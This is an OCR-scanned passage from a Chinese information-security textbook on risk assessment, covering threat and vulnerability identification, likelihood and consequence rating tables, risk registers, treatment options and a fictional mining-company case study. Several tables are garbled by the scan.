“威胁 ”和 “风险 ”尽管 具有 不 同 的 含义 ， 但 在 这 里 经 常 交替 使 用 。 在 上 面 所 引用 的 标准 中 对 
这 些 术 语 的 定义 有 相当 大 的 不 同 。 下 列 定义 将 有 助 于 我 们 的 讨论 : 


资产 (asset): 需要 保护 的 对 所 有 者 有 价值 的 系统 资源 或 能 力 。 
Bui (threat): 威胁 源 利 用 某 种 资产 的 脆弱 性 的 潜在 行为 ， 该 行为 一 旦 发 生 ， 将 危及 资产 安 
全 ， 并 损害 资产 所 有 者 的 利益 。 


脆弱 性 〈vulnerability) : 资产 在 设计 、 实 施 、 和 运行、 管理 过 程 中 可 能 被 某 种 威胁 利用 的 缺陷 
或 弱点 。 

风险 (risk): 根据 以 下 两 个 要 素 组 合计 算出 的 潜在 损失 : 给 定 威胁 利用 资产 本 身 的 脆弱 性 的 
可 能 性 以 及 对 资产 所 有 者 造成 的 损害 程度 。 





图 1-2 说 明了 以 上 几 个 概念 与 其 他 安全 概念 之 间 的 关系 。 该 图 表明 核心 术语 “风险 ”由 威 
胁 利用 资产 的 脆弱 性 所 产生 ， 又 会 导致 组 织 的 价值 遭受 损失 。 

这 个 阶段 的 目标 是 识别 出 已 列 资产 的 潜在 的 重大 风险 。 因 此 ， 对 每 一 项 资产 ， 都 需要 和 弄 清 
以 下 几 个 问题 : 

1. 谁 或 者 什么 导致 它 受 到 损害 ? 

2. 损害 是 如 何 发 生 的 ? 

威胁 识别 ”要 回答 上 述 的 第 一 个 问题 ,需要 识别 资产 面临 的 潜在 威胁 。 广 义 上 讲 ， 威胁 是 
任何 可 能 会 阻碍 或 阻止 资产 得 到 适当 水 平 的 关键 安全 服务 的 事情 ， 这 些 关 键 安全 服务 包括 : 保 
密 性 、 完 整 性 、 可 用 性 、 可 核查 性 、 真 实 性 和 可 靠 性 。 注 意 ,一 个 资产 可 以 面临 多 个 威胁 ， 而 
一 个 威胁 也 可 以 针对 多 个 资产 。 

威胁 既 可 以 是 自然 的 ， 也 可 以 是 人 为 的 ; 既 可 以 是 偶然 的 ， 也 可 以 是 故意 的 。 这 被 称 为 
威胁 源 。 典 型 的 自然 威胁 源 常 被 称 为 天 灾 ， 包 括 火 灾 、 水 灾 、 暴 风雨 、 地 震 和 其 他 一 些 自然 事 
件 。 环 境 威胁 如 长 期 的 电力 或 天 然 气 中 断 ， 也 包括 在 自然 威胁 之 内 。 还 可 能 是 化 学 污染 或 泄漏 
的 结果 。 另 一 种 情况 下 ， 威 胁 源 可 以 是 直接 或 间接 造成 影响 的 人 为 活动 。 前 者 如 内 部 人 员 为 了 
个 人 利益 而 获取 并 出 卖 信息 ， 或 者 黑客 通过 因特网 攻击 组 织 的 服务 器 。 后 者 如 一 些 人 编写 并 释 
放 网络 蠕 虫 以 感染 组 织 的 系统 。 上 述 的 例子 都 是 故意 造成 的 威胁 。 然 而 ， 威 胁 也 可 以 是 意外 事 
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件 的 结果 ， 比 如 雇员 在 系统 中 输入 信息 不 正确 ， 从 而 导致 系统 故障 。 

识别 可 能 的 威胁 和 威胁 源 ， 需 要 通过 各 种 渠道 ， 并 结合 风险 评估 者 的 经 验 。 在 任何 特定 
领域 ， 自 然 威胁 发 生 的 概率 通常 能 从 保险 统计 数据 中 得 到 。 其 他 潜在 威胁 的 列表 可 以 在 各 种 标 
准 、IT 安全 调查 的 结果 和 政府 安全 机 构 发 布 的 信息 中 找到 。 每 年 的 计算 机 犯罪 报告 ， 例 如 美 
国 的 CSUFBI 和 Verizon 发 布 的 报告 以 及 其 他 国家 发 布 的 报告 ， 在 广泛 的 IT 威胁 环境 和 最 常见 
的 问题 领域 中 ， 提 供 了 有 用 的 通用 指南 。 标 准 ， 例 如 [NIST12] 附录 D 中 提供 的 威胁 源 分 类 法 
和 附录 E 中 提供 的 威胁 实例 ， 在 这 里 也 有 帮助 。 

然而 ， 这 种 通用 指导 需要 针对 组 织 及 其 所 运行 的 环境 进行 一 些 调整 。 这 就 需要 对 组 织 信息 
系统 内 的 脆弱 性 进行 分 析 ， 因 为 某 些 风险 的 影响 比 在 通常 的 情形 下 大 些 或 者 小 些 。 对 于 组 织 高 
度 关注 的 安全 方面 需要 具体 识别 其 威胁 ， 可 以 按照 [NIST12] 所 述 的 方法 对 威胁 场景 进行 建 模 、 
开发 和 分 析 。 组 织 定义 一 些 威胁 场景 来 描述 攻击 者 如 何 部 署 战术 、 技 术 和 规程 ， 这 样 会 造成 损 
害 。 应 将 蓄意 攻击 者 对 组 织 的 可 能 攻击 动机 ， 作 为 风险 变化 的 潜在 影响 因素 。 此 外 ,组织 要 考 
虑 以 前 所 发 现 的 受 攻 击 经 历 ， 因 为 这 可 以 作为 风险 要 发 生 的 具体 证 据 。 当 评估 可 能 的 人 为 威胁 
源 时 ， 他 们 对 组 织 的 攻击 原因 和 攻击 能 力 值得 考虑 ， 这 包括 : 
动机 : 他 们 为 什么 要 以 这 个 组 织 为 目标 ;他们 的 动机 如 何 ? 
能 力 : 他 们 利用 威胁 的 技术 水 平 如 何 ? 
资源 : 他 们 可 能 利用 多 少时 间 、 金 钱 和 其 他 资源 ? 
攻击 的 可 能 性 : 你 的 资产 被 作为 目标 的 可 能 性 有 多 大 ? 频率 有 多 高 ? 

。 RR: 对 于 攻击 者 ， 被 发 现 的 后 果 是 什么 ? 

脆弱 性 识别 ”回答 第 二 个 问题 , “损害 是 如 何 发 生 的 ?” 需 要 识别 组 织 的 信息 系统 或 过 程 可 
能 被 威胁 源 利用 的 缺陷 或 弱点 。 这 将 帮助 确定 威胁 对 组 织 的 适用 性 及 严重 性 。 需 要 注意 的 是 ， 
仅仅 存在 某 种 脆弱 性 并 不 意味 着 对 资产 的 损害 将 会 产生 。 对 某 种 威胁 来 说 ， 还 必须 有 一 个 威胁 
源 可 以 利用 脆弱 性 来 造成 损害 。 威 肋 和 漏洞 组 合 起 来 构成 了 对 资产 的 风险 。 

同样 ， 前 面 所 列 出 的 许多 标准 都 包含 威胁 和 脆弱 性 的 核查 表 以 及 列 出 这 些 威胁 与 脆弱 性 并 
确定 它们 与 组 织 相关 性 的 工具 和 技术 。 这 一 步 的 输出 应 当 是 威胁 和 脆弱 性 列表 以 及 对 其 发 生 方 
式 和 发 生 原因 的 简要 描述 。 


14.4.3 分析 风险 


识别 了 关键 资产 以 及 这 些 资产 所 暴露 的 可 能 威胁 和 脆弱 性 之 后 ， 下 一 步 是 确定 它们 对 组 织 
的 风险 等 级 的 影响 。 这 样 做 的 目的 是 对 那些 威胁 到 组 织 正 常 运行 的 风险 进行 识别 和 分 类 。 风 险 
分 析 也 为 管理 层 提供 了 信息 ， 帮 助 管理 者 评价 这 些 风险 并 决定 如 何 最 好 地 处 置 这 些 风险 。 风 险 
分 析 需 要 首先 根据 已 有 控制 措施 ， 确 定 资产 的 每 一 个 已 识别 威胁 发 生 的 可 能 性 。 然 后 确定 一 旦 
威胁 发 生 ， 将 对 组 织造 成 的 后 果 。 最 后 ， 综 合 这 些 信 息 ， 对 每 个 威胁 形成 一 个 总 体 风 险 等 级 。 
理想 情况 是 将 可 能 性 用 概率 值 表示 ， 并 将 后 果 用 一 旦 风险 发 生 所 需 组 织 付出 的 货币 成 本 表示 。 
这 样 得 出 的 风险 可 以 简单 表示 为 

风险 三 威胁 发 生 的 概率 X 组 织 的 成 本 

这 相当 于 组 织 受 到 威胁 资产 的 价值 ， 因 而 可 以 说 明 ， 要 想 将 风险 发 生 概率 降低 到 可 以 接受 
的 水 平 ， 什 么 样 的 开支 水 平 是 合理 的 。 不 幸 的 是 ,通常 很 难 确定 准确 的 概率 或 者 实际 的 损失 成 
本 。 尤 其 是 对 无 形 资产 ， 比 如 商业 秘密 的 保密 性 受 损 。 因 此 ， 大 多 数 风险 分 析 采 用 定性 方法 而 
非 定量 方法 对 上 述 两 项 评级 。 其 目标 是 得 出 风险 排序 ， 以 帮助 确定 哪个 风险 需要 最 优先 处 置 ， 
因而 不 需 给 出 绝对 数值 。 

分 析 已 有 控制 措施 ”在 确定 威胁 的 可 能 性 之 前 ， 需 要 识别 被 组 织 用 来 最 小 化 威胁 的 已 有 控 
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制 措施 。 安 全 控制 措施 (control) 包括 通过 降低 威胁 源 利 用 脆弱 性 的 能 力 来 减少 组 织 对 风险 的 
暴露 程度 的 管理 、 运 行 和 技术 方面 的 过 程 与 规程 。 通 过 使 用 核查 表 以 及 访谈 组 织 关 键 员 工 以 征 
求 相关 信息 ， 可 以 识别 已 有 控制 措施 。 . 

确定 可 能 性 ”识别 了 已 有 控制 措施 之 后 ， 就 需要 确定 每 个 已 识别 威胁 发 生 并 对 某 些 资产 造 
成 损害 的 可 能 性 ( likelihood)。 可 能 性 通常 定性 描述 ， 使 用 表 14-2 9S 所 示 的 值 和 描述 。 尽 管 各 
种 风险 评估 标准 都 建议 了 类 似 的 表格 ,但 它们 在 细节 上 有 相当 大 的 差异 9。 在 风险 评估 过 程 开 
始 阶 段 建立 情境 时 ， 具 体 描述 和 表格 就 确定 下 来 了 。 


表 14-2 风险 可 能 性 


等 级 扩展 的 定义 
1 仅仅 是 在 特殊 情况 下 才 会 发 生 ， 可 以 认为 “不 凑巧 ”或 非常 不 可 能 
2 可 能 会 在 某 些 时 候 发 生 ， 但 针对 当前 控制 措施 、 情 况 和 最 近 事态 ， 认 为 不 会 发 生 
3 可 能 会 在 某 些 时 候 发 生 ， 也 可 能 不 发 生 。 由 于 外 部 影响 ， 很 难 控制 是 否 发 生 
4 在 某 些 情况 下 将 很 可 能 发 生 ， 且 人 们 对 它 的 发 生 不 会 惊异 
5 认为 在 大 多 数 情况 下 会 发 生 ， 且 迟早 一 定 会 发 生 

到 底 哪 个 等 级 更 合适 ， 在 这 个 问题 上 ， 很 可 能 存在 不 确定 性 和 争论 。 这 反映 了 等 级 划分 的 
定性 本 质 、 各 等 级 含义 的 模糊 性 和 威胁 最 终 发 生 的 可 能 性 的 不 确定 性 。 重 要 的 是 记 住 这 个 过 程 
的 目标 是 给 管理 层 就 存在 哪些 风险 提供 指南 ， 并 提供 足够 的 信息 来 帮助 管理 层 决定 怎样 做 出 最 
恰当 的 响应 。 任 何在 等 级 选择 上 的 不 确定 性 ， 都 应 当 在 对 选择 进行 讨论 时 给 予 关注 ， 最 终 管 理 
者 将 根据 这 些 信 息 做 出 商业 决策 。 

风险 分 析 人 员 从 这 个 过 程 之 前 的 步骤 中 获得 资产 描述 和 威胁 / 脆弱 性 细节 ， 根 据 组 织 的 总 
体 风 险 环 境 和 已 有 控制 措施 ， 确 定 适 当 的 等 级 。 估 算 方法 与 特定 威胁 利用 一 个 或 一 组 资产 的 一 
个 或 多 个 脆弱 性 从 而 对 组 织造 成 损害 的 可 能 性 有 关 。 当 考虑 蓄意 的 人 为 威胁 源 时 ， 估 算 应 该 包 
括 对 攻击 者 意图 、 能 力 和 具体 攻击 目标 的 评价 。 具 体 的 可 能 性 需要 结合 实际 情况 考虑 。 特 别 
地 ,“ 很 可 能 ”或 更 高 的 级 别 暗示 着 该 威胁 在 以 前 某 个 时 候 曾 发 生 过 。 这 意味 着 过 去 的 历史 记 
录 为 该 判断 提供 了 支持 依据 。 如 果 并 非 上 述 情形 ， 要 指定 上 述 值 就 需要 从 以 下 方面 证 明 其 合理 
性 : 威胁 环境 产生 了 显著 变化 ， 信 息 系统 变更 削弱 了 系统 的 安全 性 ， 或 者 其 他 说 明 预 期 威胁 可 
能 发 生 的 理由 。 相 反 ,“ 不 可 能 ”和 “ 极 不 可 能 ”等 级 很 难 量化 。 它 们 只 是 表示 威胁 需要 考虑 ， 
但 是 否 会 发 生 很 难 确定 。 一 般 情 况 下 ， 这 样 的 威胁 仅仅 在 当 它 们 发 生 将 给 组 织带 来 严重 的 后 果 
时 才 会 考虑 ， 即 使 极其 不 可 能 发 生 。 

确定 对 组 织 的 后 果 / 影 响 分 析 人 员 接 下 来 必须 确定 每 一 个 威胁 最 终 发 生 所 造成 的 后 果 。 
注意 ， 这 与 威胁 发 生 的 可 能 性 既 不 相同 ， 也 不 相关 。 实 际 上 ， 后 果 ( consequence) 描述 表明 了 
所 讨论 的 特定 威胁 最 终 发 生 时 将 对 组 织造 成 的 影响 。 即 使 一 个 威胁 被 认为 是 “ 极 不 可 能 ”或 
“不 可 能 ”， 如 果 一 旦 发 生 ， 组 织 将 遭受 严重 后 果 ， 那 么 显然 它 会 给 组 织带 来 风险 。 因 此 ， 必 须 
考虑 如 何 做 出 适当 的 响应 。 通 常 采用 定性 描述 的 值 来 描述 后 果 ， 如 表 14-3 所 示 。 同 可 能 性 评 
级 一 样 ， 其 对 于 确定 最 佳 后 果 等 级 ， 也 有 一 定 的 不 确定 性 。 

后 果 等 级 的 确定 应 当 基 于 资产 拥有 者 和 组 织 管理 层 的 判断 ， 而 不 是 风险 分 析 人 员 的 意见 。 
这 与 可 能 性 的 确定 是 相反 的 。 具 体 的 后 果 需 要 结合 实际 情况 考虑 。 它 必须 与 特定 威胁 一 旦 发 生 


CO 本 表 以 及 表 14-3 和 表 14-4， 改 编 自 [ISO27005]、[1SO31000]、[SASN06] 和 [SA04] 所 给 出 的 表格 ， 但 对 描 
述 进行 了 扩展 和 推广 以 适用 于 范围 更 广 的 组 织 。 
O ”本章 所 选用 的 表格 与 其 他 一 些 标准 相 比 ， 能 说 明 一 种 更 为 精细 的 分 析 层 次 。 
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将 会 对 组 织造 成 的 整体 影响 联系 起 来 ， 而 并 不 仅仅 是 对 受 侵害 系统 的 影响 。 一 个 特定 的 系统 
(如 某 个 位 置 的 服务 器 ) 在 一 场 火灾 中 被 完全 毁坏 是 可 能 的 。 然 而 ， 这 对 组 织造 成 的 影响 会 有 
很 大 不 同 ， 可 能 造成 轻微 影响 (该 服务 器 位 于 分 支 机 构 ， 所 有 数据 在 其 他 地 方 存 有 备份 )， 也 
可 能 酿 成 巨大 灾难 (该 服务 器 中 存 有 某 小 型 企业 的 所 有 客户 和 财务 记录 的 唯一 副本 )。 与 可 能 


性 等 级 一 样 ， 后 果 等 级 也 必须 在 了 解 组 织 当前 的 工作 做 法 与 安排 的 基础 上 确定 。 特 别 地 ， 组 织 
是 否 具有 备份 、 灾 难 恢 复 和 应 急 规划 也 会 影响 等 级 的 选择 。 
表 14-3 风险 后 果 
等 级 扩展 的 定义 
| | gpp | 通常 是 在 单一 领域 的 轻微 安全 违规 的 结果 。 影 响 可 能 仅仅 持续 不 到 几 天 时 间 ， 仅 仅 需 要 很 
少 的 开支 加 以 纠正 。 通 常 不 会 对 组 织 的 资产 造成 有 形 的 损害 
在 一 、 两 个 领域 安全 违规 的 结果 。 影 响 可 能 持续 不 到 一 周 ， 能 在 工段 或 项 目 层面 得 到 处 
2 轻微 | 理 ， 无 须 管理 者 介入 。 通 常 使 用 项 目 或 团队 的 资源 就 可 以 纠正 。 同 样 ， 对 组 织 的 资产 不 会 造 
成 有 形 的 损害 ， 但 事后 可 能 发 现 曾 志 失 机 会 或 影响 效率 
有 限 的 系统 级 (可 能 是 持续 中 的 ) 安全 违规 。 影 响 持续 时 间 可 达 两 周 ， 尽 管 仍 能 在 项 目 或 
3 中 等 “| 团队 层面 处 理 ， 但 一 般 需要 管理 者 介 人 。 人 需要 持续 的 合 规 成 本 来 解决 问题 。 客 户 或 公众 可 以 
间接 意识 到 或 得 到 与 此 相关 的 有 限 信息 


持续 中 的 系统 级 安全 违规 。 影 响 可 能 持续 4-8 周 ， 需 要 重要 管理 者 介入 以 及 相关 资源 来 处 

4 严重 |= 需要 高 级 管理 层 在 事件 持续 期 间 保持 持续 的 直接 管理 ， 预 期 投入 大 量 合 规 成 本 。 客 户 或 
公众 能 意识 到 事态 的 发 生 ， 并 将 发 现 一 系列 重要 情况 。 有 可 能 造成 业务 或 组 织 成 果 的 损失 ， 
损失 的 程度 则 是 不 可 预料 的 ， 特 别 是 当 这 种 损失 只 会 发 生 一 次 的 时 候 


严重 的 系统 级 安全 违规 。 影 响 将 持续 3 个 月 或 更 多 ， 高 级 管理 层 需要 在 事态 持续 期 间 介 入 
来 解决 问题 。 预 期 投入 大 量 合 规 成 本 。 客 户 业 务 有 损失 或 其 他 对 组 织 的 严重 损害 可 能 出 现 。 
可 能 会 有 大 量 公众 或 政治 人 物 责 备 组 织 并 对 组 织 失去 信心 。 可 能 会 对 相关 人 员 追 究 刑事 责任 
或 纪律 处 分 


多 起 严重 的 系统 级 安全 违规 。 影 响 持续 时 间 无 法 确定 ， 高 级 管理 层 被 要 求 将 公司 转 人 自愿 托 
6 毁灭 性 | 管 程序 或 进行 其 他 形式 的 重大 重组 。 预 计 对 高 级 管理 层 的 刑事 诉讼 将 开始 ， 无 法 避免 业务 的 重 
大 损失 ， 组 织 目标 无 法 实现 。 合 规 成 本 可 能 导致 多 年 亏损 ， 甚 至 可 能 造成 组 织 的 清算 结业 


5 灾难 性 


表 14-4 风险 等 级 确定 及 其 含义 





需要 执行 / 董事 层 的 详细 研究 和 管理 计划 。 要 求 具有 持续 的 规划 和 监视 并 定期 评审 。 需 要 对 管理 
风险 的 控制 措施 进行 重大 调整 ， 成 本 可 能 超过 最 初 的 预算 


高 (H) 需要 管理 层 重视 ， 但 管理 和 计划 可 以 交 给 高 级 项 目 或 团队 领导 承担 。 可 能 具有 持续 的 规划 和 监视 
并 定期 评审 ， 不 过 可 能 仅 限 在 已 有 资源 范围 内 对 控制 措施 进行 调整 


中 (M) 可 以 利用 已 有 的 特定 监视 和 响应 规程 加 以 控制 。 可 以 由 员工 通过 恰当 的 监视 和 评审 进行 管理 
4K (L) 可 以 通过 例 行 规程 加 以 控制 


极 高 (E) 
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确定 最 终 的 风险 等 级 一 旦 每 个 特定 威胁 发 生 的 可 能 性 及 后 果 被 确定 ， 就 可 以 为 最 终 的 
风险 等 级 赋值 。 这 通常 是 通过 使 用 一 张 将 这 些 值 映射 到 风险 等 级 的 表 来 实现 ， 如 表 14-4 所 示 。 
该 表 详细 说 明了 每 一 种 组 合 被 赋予 的 风险 等 级 。 这 样 的 表 提 供 了 与 采用 定量 值 进 行 理想 的 风险 
计算 等 效 的 定性 方法 。 它 也 给 出 了 对 这 些 赋值 等 级 的 解释 。 

将 结果 记录 到 风险 注册 表 风险 分 析 过 程 的 结果 应 当 记 录 到 风险 注册 表 。 其 中 应 包括 类 似 
表 14-5 所 示 的 汇总 表 。 风 险 通 常 按 等 级 降序 排列 。 包 括 基 本 原理 、 合 理性 证 明 以 及 支持 证 据 
在 内 的 支撑 材料 详细 说 明 如 何 确定 表 中 的 各 项 内 容 。 该 文件 的 目的 是 为 高 级 管理 层 提供 必要 的 
信息 ， 以 便 对 如 何 对 已 识别 风险 进行 最 优 管理 一 类 事情 做 出 合理 的 决策 。 它 也 为 随后 是 否 根据 
需要 进行 形式 化 的 风险 评估 过 程 提供 证 据 ， 还 对 已 做 决策 及 其 制定 原因 进行 了 记录 。 


表 14-5 风险 注册 表 


14.4.4 ”评价 风险 


一 旦 确定 了 潜在 的 重要 风险 的 相关 细节 ， 管 理 层 就 需要 决定 是 否 需 要 采取 措施 做 出 响应 。 
这 需要 考虑 组 织 的 风险 状况 及 其 接受 某 个 风险 级 别 的 意愿 ， 而 这 些 是 在 风险 分 析 过 程 最 初 的 
“建立 情境 ”阶段 确定 的 。 那 些 风险 在 可 接受 级 别 以 下 的 项 目 通常 被 接受 ， 不 需要 采取 进一步 
措施 。 而 风险 高 于 可 接受 水 平 的 项 目 则 需要 考虑 对 其 进行 处 置 。 


14.4.5 ”风险 处 置 


一 般 情况 下 ， 级 别 较 高 的 风险 也 是 那些 更 迫切 需要 采取 措施 的 风险 。 然 而 ， 可 能 有 些 风 险 
比 其 他 风险 处 理 起 来 更 容易 、 快 捷 和 经 济 。 在 表 14-5 中 所 示 的 风险 注册 表 实 例 中 ， 两 个 风险 
的 等 级 都 是 “高 " 。 进 一 步 的 分 析 显 示 ， 对 第 一 个 风险 来 说 ， 处 置 方法 相对 简单 和 经 济 ， 通 过 
加 固 路 由 器 配置 以 严格 限制 可 能 的 访问 即 可 。 而 处 置 第 二 个 风险 则 需要 制定 一 个 完整 的 灾难 恢 
复 计划 ， 这 是 一 个 更 缓慢 、 成 本 更 高 的 过 程 。 因 此 ， 管 理 层 将 首先 采取 简单 的 措施 ， 以 尽快 地 
改善 组 织 的 总 体 风险 状况 。 管 理 层 甚至 可 以 出 于 业务 原因 ， 从 组 织 整体 角度 出 发 ， 决 定 某 些 低 
等 级 风险 在 其 他 风险 之 前 被 处 置 。 这 反映 出 在 风险 
分 析 过 程 中 要 从 整体 上 考虑 可 用 等 级 及 其 含义 和 组 
织 管 理 层 态度 两 方面 因素 的 限制 。 

图 14-5 显示 了 成 本 与 风险 等 级 的 各 种 可 能 组 
合 。 如 果 处 置 成 本 高 ， 但 风险 低 ， 那 么 进行 这 种 处 
置 通常 是 不 经 济 的 。 相 反 ， 如 果 风 险 高 而 成 本 相对 
较 低 ， 那 么 应 该 进行 处 置 。 两 个 极端 之 间 的 区 域 是 
最 难 做 出 决定 的 。 这 正 需要 管理 层 做 出 能 够 最 有 效 
利用 可 用 资源 的 业务 决策 。 做 决策 通常 需要 对 各 种 
处 置 方法 进行 更 详细 的 调查 。 对 于 管理 层 处置 已 识 
别 的 风险 ， 有 5 种 广义 的 可 选 方案 : 

e 风险 接受 : 出 于 业务 原因 而 选择 去 接受 超出 Li 

正常 的 风险 等 级 。 这 通常 是 由 于 处 置 这 些 风 $ 处 置 成 本 hes 
险 需 要 过 多 的 成 本 或 时 间 。 管 理 层 因而 必须 图 14-5 对 风险 处 置 的 判断 






因特网 路 由 器 
数据 中 心 大 楼 
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对 风险 发 生 对 组 织 所 造成 的 后 果 承 担 责任 。 

© 风险 规避 : 不 进行 会 产生 风险 的 活动 ， 不 运行 相关 系统 。 这 通常 导致 在 实现 某 些 对 组 
织 有 用 的 功能 时 不 方便 或 者 不 能 实现 。 能 力 的 损失 换 回 了 风险 水 平 的 降低 。 

e 风险 转移 : 与 第 三 方 共 同 承担 风险 责任 。 典 型 的 措施 包括 : 对 可 能 发 生 的 风险 投保 ， 
与 另 一 家 组 织 签订 合同 ， 通 过 采取 合伙 或 合资 结构 来 分 担 威胁 发 生 所 带 来 的 风险 和 
成 本 。 

© 减轻 后 果 : 通过 调整 具有 风险 的 资产 的 结构 来 减少 风险 发 生 时 对 组 织 所 造成 的 影响 。 
这 可 以 通过 实施 控制 措施 使 组 织 在 风险 发 生 后 迅速 恢复 来 实现 。 实 例 包 括 实施 场 外 备 
份 过 程 、 制 定 灾难 恢复 计划 、 把 数据 和 处 理 过 程 复制 到 多 个 站 点 。 

。 减少 可 能 性 : 通过 实施 适宜 的 控制 措施 来 降低 脆弱 性 被 利用 的 机 会 。 这 可 以 包括 技术 
性 或 管理 性 的 控制 措施 ， 比 如 部 署 防火 墙 和 访问 令 牌 ， 或 更 改口 令 复杂 度 和 策略 之 类 
的 规程 。 实 施 这 些 控制 措施 的 目的 是 提高 资产 的 安全 ， 减 少 资产 的 脆弱 性 从 而 使 得 攻 
击 者 更 难 成 功 。 

如 果 选 择 了 最 后 两 种 可 选 方案 中 的 任何 一 种 ， 就 需要 选择 可 能 的 处 置 控制 措施 ， 并 评价 其 
成 本 效益 。 有 大 量 可 供 采 用 的 管理 、 运 行 和 技术 控制 措施 。 可 对 这 些 控制 措施 进行 全 面 分 析 ， 
从 中 选择 那些 可 以 最 有 效 地 处 理 已 识别 威胁 的 控制 措施 ， 并 进行 成 本 效益 分 析 。 然 后 ， 管 理 层 
要 从 这 些 控制 措施 中 选择 应 该 采纳 的 ， 并 确定 其 实施 方案 。 第 15 章 介 绍 了 经 常 使 用 的 控制 措 
施 以 及 安全 计划 和 策略 的 使 用 ， 在 第 16 ~ 18 章 提供 了 某 些 控制 域 的 更 多 细节 。 


14.5 RHF: 银 星 矿业 


我 们 用 一 个 案例 来 说 明 风 险 评 估 过 程 9， 其 中 涉及 一 家 虚构 的 公司 一 一 银 星 矿 业 。 银 星 矿 
业 是 一 个 本 地 运行 的 大 型 全 球 性 矿业 公司 。 它 有 一 套 被 许多 业务 领域 使 用 的 大 型 IT 基础 设施 。 
其 网 络 包括 各 种 各 样 的 服务 器 ， 运 行 着 适合 于 其 组 织 规模 的 一 系列 应 用 软件 。 同 时 ， 它 也 使 用 
一 些 不 常用 的 应 用 程序 ， 其 中 的 一 些 直接 关系 到 井下 人 员 的 健康 和 安全 。 在 过 去 ， 这 些 系统 许 
多 都 是 孤立 的 ， 在 它们 之 间 没 有 网 络 连接 。 最 近 几 年 ， 它 们 被 连接 到 了 一 起 ， 而 且 还 连接 到 了 
公司 的 内 部 网 以 提供 更 好 的 管理 能 力 。 然 而 ， 这 也 意味 着 现在 它们 有 了 被 因特网 访问 的 可 能 ， 
这 极 大 地 增加 了 这 些 系统 的 风险 。 

一 名 安全 分 析 员 按 约定 要 为 公司 提出 一 个 有 关 该 公司 风险 状况 的 初步 评价 意见 ， 并 且 为 改 
善 公司 风险 状况 推荐 进一步 的 行动 方案 。 通 过 与 公司 管理 层 的 初步 讨论 ， 决 定 采用 一 个 组 合 的 
解决 方案 来 进行 安全 管理 。 这 需要 公司 的 IT 支持 小 组 对 他 们 的 系统 采用 适当 的 基线 标准 。 同 
时 ， 分 析 员 被 要 求 对 关键 信息 系统 运行 进行 初步 的 形式 化 评估 ， 找 出 其 中 那些 风险 最 大 的 资 
产 ， 以 便 管理 部 门 之 后 考虑 如 何 处 置 。 

第 一 步 是 确定 风险 评估 的 情境 。 因 为 矿产 业 公 司 处 于 风险 图 谱 的 低 风险 端 ， 因 此 不 太 可 能 
成 为 专门 攻击 的 目标 。 银 星 矿业 是 一 个 大 组 织 的 一 部 分 ， 因 此 它 受 制 于 职业 健康 和 安全 的 法 律 
要 求 并 需要 对 股东 负责 。 因 此 ， 管 理 部 门 决定 一 般 情 况 下 只 接受 中 等 或 较 低 的 风险 。 这 个 风险 
评估 的 边界 被 具体 指定 为 ， 仅 包括 处 在 银 星 矿业 运营 部 门 直接 控制 下 的 系统 。 这 排除 了 广泛 的 
公司 内 部 网 、 中 心服 务 器 和 因特网 网 关 。 这 次 评估 得 到 了 银 星 的 IT 和 工程 经 理 的 支持 ， 该 结 
果 将 报告 给 公司 董事 会 。 评 估 将 采用 本 章 描述 的 过 程 和 风险 等 级 。 

下 一 步 ， 需 要 识别 关键 资产 。 分 析 员 对 公司 的 关键 IT 和 工程 经 理 进行 了 访谈 。 许 多 工程 


O ”这 个 实例 是 对 2003 年 Peter Hoek 的 学 习 实例 的 改编 和 扩展 。 原 来 的 公司 名 称 和 可 识别 细节 已 经 根据 需要 进 
行 了 修改 。 
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经 理 都 强调 了 SCADA 网 络 和 结 点 的 可 靠 性 对 公司 的 重要 性 。 它 们 监控 着 公司 的 核心 采矿 作 
业 ， 并 且 使 运作 安全 和 高 效 ， 最 关键 的 是 它们 给 公司 带 来 了 收入 。 这 其 中 的 一 些 系统 还 维护 
着 法 律 需要 的 记录 ， 负 责 矿 产业 的 政府 部 门 会 定期 检查 这 些 记 录 。 任 何在 创建 、 维 护 或 导出 
这 些 记录 时 的 失误 ， 都 将 使 公司 面临 罚款 或 者 其 他 法 律 制裁 。 因 此 ， 这 些 系 统 被 列 为 第 一 关键 
资产 。 

很 多 IT 经 理 表 示 大 量 的 关键 数据 被 储存 在 各 式 各 样 的 文件 服务 器 中 ， 或 者 分 布 在 独立 的 
文件 中 ， 或 者 在 数据 库 中 。 他 们 认为 这 些 数 据 的 完整 性 对 公司 很 重要 。 这 些 数据 中 有 些 是 应 用 
程序 自动 生成 的 ， 其 他 则 是 由 员工 使 用 普通 办 公 软 件 生 成 的 。 这 些 数据 有 一 部 分 需要 时 刻 准备 
接受 政府 部 门 的 审计 。 还 有 生产 和 操作 的 数据 结果 、 合 同和 标书 、 人 事 资料 、 应 用 软件 的 备 
份 、 运 营 和 资产 开支 、 采 矿 调查 和 计划 ， 以 及 钻探 资料 等 数据 。 总 而 言 之 ， 这 些 存 储 数 据 的 完 
整 性 被 识别 为 第 二 关键 资产 。 

这 些 经 理 还 指出 三 个 关键 系统 一 一 财务 、 采 购 和 维护 /生产 服务 器 对 核心 业务 领域 的 高 效 
运作 是 至 关 重 要 的 。 任 何 对 这 些 系 统 的 可 用 性 或 完整 性 的 损害 都 将 影响 到 公司 的 高 效 运作 能 
力 。 因 此 ， 它 们 中 的 每 一 个 系统 都 被 识别 为 关键 资产 。 

最 后 ， 通 过 对 公司 所 有 业务 部 门 进行 访谈 ， 分 析 员 认为 电子 邮件 也 是 一 个 关键 资产 。 电 子 
邮件 的 使 用 已 经 成 为 连接 所 有 业务 部 门 的 重要 工具 。 在 所 有 交流 中 ， 大 约 有 60% 是 以 电子 邮 
件 的 形式 进行 的 ， 它 常用 来 进行 日 常 的 通信 ， 联 系 对 象 包 括 总 部 、 其 他 业务 单元 、 供 应 商 、 承 
包 商 等 ， 同 时 还 处 理 着 大 量 的 内 部 邮件 。 考 虑 到 公司 地 处 偏远 ， 所 以 电子 邮件 显得 更 为 重要 。 
因此 ， 电 子 邮 件 服务 共同 的 可 用 性 、 完 整 性 和 保密 性 被 列 为 关键 资产 。 

在 表 14-6 第 一 列 中 可 看 到 关键 资产 清单 ， 它 就 是 根据 风险 注册 表 在 风险 评估 过 程 结束 时 
创建 的 。 


14-6 银 星 矿业 一 一 风险 注册 表 


控制 系统 的 非 | 分 层 的 防火 墙 和 | 极 不 可 能 | 严重 高 
ee a 
信息 的 损坏 、| 防火墙、 策略 可 能 严重 极 高 
mka 

攻击 者 /影响 系 | ” 防火墙、 策略 

攻击 者 /影响 系 | 防火墙、 策略 可 能 中 等 高 
ER 
攻击 者 /影响 系 | 防火墙、 策略 可 能 轻微 中 
统 的 错误 件 网 关 

